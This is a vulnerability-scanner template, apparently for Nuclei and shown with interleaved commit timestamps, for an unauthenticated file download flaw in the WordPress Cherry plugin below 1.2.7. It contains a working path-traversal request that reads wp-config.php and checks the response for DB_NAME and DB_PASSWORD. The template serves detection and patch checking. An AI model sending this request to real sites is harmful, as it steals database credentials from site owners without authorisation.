2021-10-14 10:59:47 +00:00
id : cherry-file-download
2021-10-13 23:54:12 +00:00
info :
2022-05-13 17:22:26 +00:00
name : Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload
2021-10-13 23:54:12 +00:00
author : 0x_Akoko
severity : high
2022-05-13 17:22:26 +00:00
description : WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.
2021-10-14 10:59:47 +00:00
reference :
- https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee
- https://github.com/CherryFramework/cherry-plugin
2022-04-21 21:16:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score : 8.6
cwe-id : CWE-22
2021-10-14 10:59:47 +00:00
tags : wordpress,wp-plugin,lfi
2021-10-13 23:54:12 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php'
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
part : body
condition : and
- type : status
status :
- 200
2022-04-21 21:16:41 +00:00
# Enhanced by mp on 2022/04/21